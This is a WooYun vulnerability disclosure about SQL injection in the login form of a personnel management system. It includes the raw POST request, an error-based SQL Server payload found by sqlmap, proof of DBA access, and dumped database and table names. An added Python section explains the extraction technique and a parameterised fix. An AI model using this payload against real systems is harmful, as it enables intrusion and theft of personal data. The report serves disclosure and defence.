WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader ---------------- http://drop.zone.ci/
2015-10-09: Details reported to the vendor, awaiting vendor response
2015-10-13: Vendor has confirmed; details disclosed to the vendor only
2015-10-23: Details disclosed to core white hats and relevant domain experts
2015-11-02: Details disclosed to regular white hats
2015-11-12: Details disclosed to intern white hats
2015-11-27: Details disclosed to the public
As the title says.
URL:http://**.**.**.**:8012/login.aspx
Injection test:
POST /login.aspx HTTP/1.1
Host: **.**.**.**:8012
Proxy-Connection: keep-alive
Content-Length: 349
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**:8012
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**:8012/login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8

__VIEWSTATE=%2FwEPDwUKLTc4NTc0ODYxOWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFDEltYWdlQnV0dG9uMgUMSW1hZ2VCdXR0b24xa3OD%2Bg4lEUPB%2BJsmGq%2FVMwgAOHQ%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWBQLQ3t%2B6CwLs0bLrBgLs0fbZDALSwtXkAgLSwpnTCGEQxOOPY6dcOlWAgRH%2BS1AJHtQk&TextBox1=admin&TextBox2=admin&ImageButton2.x=0&ImageButton2.y=0
Databases:
available databases [60]:
[*] 04F-MEP
[*] 1111
[*] 16F-MEP
[*] 5FBIM
[*] B1F
[*] BIMFIMBasic
[*] BIMFIMUserManage
[*] BJ_IKEA_B1_MEP
[*] CostManage
[*] CscecKq_GPRS
[*] HBDS01
[*] HBDS02
[*] JPS
[*] JPS-XT
[*] JZ
[*] master
[*] model
[*] MR2000DB
[*] msdb
[*] NT
[*] ProjectDocument
[*] ProjectDocument1
[*] ProjectDocument10
[*] ProjectDocument11
[*] ProjectDocument3
[*] ProjectDocument4
[*] ProjectDocument6
[*] ProjectDocument9
[*] QD
[*] RD
[*] ReportServer
[*] ReportServerTempDB
[*] RFD
[*] SH_SOHO_AS
[*] SH_SOHO_B1_AS
[*] SH_SOHO_B1_MEP
[*] SH_SOHO_B2_MEP
[*] SH_SOHO_B3_MEP
[*] tempdb
[*] WH_IKEA_GLF
[*] WH_IKEA_L10_LDJF
[*] WH_IKEA_L10A
[*] WH_IKEA_L10B
[*] WH_IKEA_L10C
[*] WH_IKEA_L11A
[*] WH_IKEA_L11B
[*] WH_IKEA_L11C
[*] WH_IKEA_L12A
[*] WH_IKEA_L12B
[*] WH_IKEA_L12C
[*] WH_IKEA_L13A
[*] WH_IKEA_L13B
[*] WH_IKEA_L13C
[*] WH_IKEA_L14C
[*] WH_IKEA_L15
[*] WH_JD_N4_CF
[*] Wul_DataAnalysis
[*] XFD
[*] XFS
[*] zk
Privileges:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: TextBox1 (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKLTc4NTc0ODYxOWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFDEltYWdlQnV0dG9uMgUMSW1hZ2VCdXR0b24xa3OD+g4lEUPB+JsmGq/VMwgAOHQ=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQLQ3t+6CwLs0bLrBgLs0fbZDALSwtXkAgLSwpnTCGEQxOOPY6dcOlWAgRH+S1AJHtQk&TextBox1=admin'+(SELECT 'wEcF' WHERE 1310=1310 AND 7705=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7705=7705) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(122)+CHAR(113))))+'&TextBox2=admin&ImageButton2.x=0&ImageButton2.y=0
---
[19:45:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[19:45:57] [INFO] testing if current user is DBA
current user is DBA: True
[19:45:57] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'
CscecKq_GPRS:
[103 tables]
+---------------------------+
| ANQUANJISHU_JIAODI        |
| AQHYI                     |
| AQHYI_SDEMP_COUNT         |
| AQJSJD_SDEMP_COUNT        |
| AQJSJD_YDEMP_COUNT        |
| AQPX_TYPE                 |
| AQ_PX                     |
| AQ_PX_SDEMP_COUNT         |
| BANZU                     |
| DB_BACKUP                 |
| Depart                    |
| DoorRightList             |
| EMPLOYEE                  |
| EMP_BX                    |
| EMP_GLRY                  |
| EMP_GLRY_TYPE             |
| EMP_GZ                    |
| EMP_HEIMINGDAN            |
| EmpManage                 |
| FB_BASE                   |
| FB_BZ_EMP                 |
| FB_LIANXIREN              |
| GANGWEI_BASE              |
| GC_TYPE                   |
| GENZONG_ZHUTI             |
| GS_User                   |
| GWZHIZE_XM                |
| GZJS_TYPE                 |
| GZ_BASE                   |
| HB_UPLOADCONFIG           |
| JCX_JY_SDEMP_COUNT        |
| JCX_JY_YDEMP_COUNT        |
| JG_XINGSHI                |
| JINGCHANGX_AQJY           |
| JUPD_DENGJI               |
| JXCAQJY_TYPE              |
| KQMACHINE_GL              |
| LBLY_GL                   |
| LBLY_GL_MX                |
| LBWUL_BASE                |
| LOGIN_EMP                 |
| NICY_GLMS                 |
| QIYE_TYPE                 |
| QX_ENABLE                 |
| QX_FB_F_XM                |
| QX_FENG_XM                |
| QX_GROUP                  |
| QX_MAIN                   |
| QX_SUOSHUZU               |
| QX_TZJMC                  |
| QX_XIANGMU                |
| SANJI_AQJY_DJ             |
| SYS_LOG                   |
| SYS_NEWS                  |
| TESHU_GZ_BASE             |
| TZJMC                     |
| TZJMC_SET                 |
| T_KQ                      |
| XINXI_LAIYUAN             |
| XM_BASE                   |
| YH_XINXI                  |
| ZHUZZHI_TYPE              |
| ZIZHI_DENGJI              |
| _GPRSKQ_DATAGET           |
| _GPRS_Analys_Log          |
| _GPRS_Communication       |
| _GPRS_Communication_TMP   |
| _GPRS_DoorControl_KongABC |
| _GPRS_DoorRightList       |
| _GPRS_Employee_tmp        |
| _GPRS_Error               |
| _GPRS_FP_SendResult       |
| _GPRS_Fp_fpData1          |
| _GPRS_Fp_fpData2          |
| _GPRS_Fp_fpData3          |
| _GPRS_Fp_fpData4          |
| _GPRS_Fp_fpIC             |
| _GPRS_Fp_fpID             |
| _GPRS_Fp_fpName           |
| _GPRS_Fp_fpPwd            |
| _GPRS_ID                  |
| _GPRS_ID_DoorControl      |
| _GPRS_KQ_Data             |
| _GPRS_KQ_Data_HIST        |
| _GPRS_KQ_Data_HIST2       |
| _GPRS_KQ_Data_HIST3       |
| _GPRS_Language            |
| _GPRS_UpTime              |
| _GPRS_yuansdkjl           |
| _GPRS_yuansdkjl_HIST      |
| _GPRS_yuansdkjl_HIST2     |
| _GPRS_yuansdkjl_HIST3     |
| _KQCANSHU                 |
| _YL_Card                  |
| dtproperties              |
| pbcatcol                  |
| pbcatedt                  |
| pbcatfmt                  |
| pbcattbl                  |
| pbcatvld                  |
| skySecCredit              |
| tb_card_rec               |
| tb_worker                 |
+---------------------------+
This site is mainly a real-name (identity) information management system, so by the look of it a large amount of personal information would be exposed. Given how much data there is, I did not test any further.
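The payload sqlmap reported above is a textbook error-based extraction: the injected CONVERT(INT, ...) forces SQL Server to fail while converting a string that carries the answer between two marker strings, and the conversion error the login page echoes back leaks it. The Python below is an added example, not code from the report or from the affected application. It recovers the marker strings from the payload, pulls the answer out of a constructed sample of the SQL Server conversion error (msg 245), shows a hypothetical string-concatenated login query of the kind the page must be running (the table name LOGIN_EMP comes from the dump; the columns UserName and Password are assumed), and contrasts it with a parameterised lookup, using an in-memory SQLite table as a stand-in for the real database.

```python
import re
import sqlite3

# TextBox1 payload exactly as sqlmap reported it in the report above.
SQLMAP_PAYLOAD = (
    "admin'+(SELECT 'wEcF' WHERE 1310=1310 AND 7705=CONVERT(INT,(SELECT "
    "CHAR(113)+CHAR(120)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7705=7705) "
    "THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(122)+CHAR(113))))+'"
)

# Constructed sample of the SQL Server conversion error (msg 245) that the
# login page would echo back; the text between the markers is the answer.
SAMPLE_ERROR = ("Conversion failed when converting the varchar value "
                "'qxvkq1qbqzq' to data type int.")

CHAR_RE = re.compile(r"CHAR\((\d+)\)")


def sqlmap_markers(payload, width=5):
    """Return (prefix, suffix) boundary strings sqlmap wraps its answer in.
    In this payload the first and last `width` CHAR() codes form the markers;
    the CHAR(49)/CHAR(48) in the middle are the '1'/'0' of the boolean probe."""
    codes = [int(c) for c in CHAR_RE.findall(payload)]
    prefix = "".join(chr(c) for c in codes[:width])
    suffix = "".join(chr(c) for c in codes[-width:])
    return prefix, suffix


def extract_from_error(error_text, prefix, suffix):
    """Pull the injected sub-query's result out of the conversion error text,
    which is what sqlmap does for every error-based request."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text)
    return m.group(1) if m else None


def build_vulnerable_query(username, password):
    """Hypothetical concatenated login query (column names are assumed).
    With the payload as username, the attacker's SELECT lands unquoted in
    the WHERE clause, which is the condition sqlmap's title describes."""
    return ("SELECT * FROM LOGIN_EMP WHERE UserName='" + username +
            "' AND Password='" + password + "'")


def is_injected(query):
    """Crude tell for the technique seen here: a CONVERT(INT,(SELECT inside
    the WHERE clause of what should be a two-literal login lookup."""
    return "CONVERT(INT,(SELECT" in query.upper()


def login_parameterised(username, password):
    """Same lookup with bound parameters. SQLite in-memory with constructed
    data stands in for the real DBMS; the payload is compared as a plain
    string and simply matches no row."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE LOGIN_EMP (UserName TEXT, Password TEXT)")
    con.execute("INSERT INTO LOGIN_EMP VALUES ('admin', 's3cret')")
    row = con.execute(
        "SELECT COUNT(*) FROM LOGIN_EMP WHERE UserName=? AND Password=?",
        (username, password),
    ).fetchone()
    con.close()
    return row[0] == 1


if __name__ == "__main__":
    pre, suf = sqlmap_markers(SQLMAP_PAYLOAD)
    print(pre, suf)                                       # qxvkq qbqzq
    print(extract_from_error(SAMPLE_ERROR, pre, suf))     # 1 (7705=7705 held)
    print(build_vulnerable_query(SQLMAP_PAYLOAD, "admin"))
    print(login_parameterised(SQLMAP_PAYLOAD, "admin"))   # False
    print(login_parameterised("admin", "s3cret"))         # True
```

The same extraction loop is what produced the database and table lists above: sqlmap swaps the CASE expression for `(SELECT DB_NAME())`, `(SELECT name FROM master..sysdatabases ...)` and so on, and reads each answer back from between the markers in the error text. Turning off detailed error pages would only slow this down (sqlmap falls back to boolean- or time-based inference); binding parameters, as in `login_parameterised`, is what removes the injection.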
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-10-13 17:51
CNVD confirms the reported situation. It has been handed to CNCERT, which forwarded it to the Hubei branch centre to coordinate handling with the organisation operating the website (a new working contact needs to be established).
None yet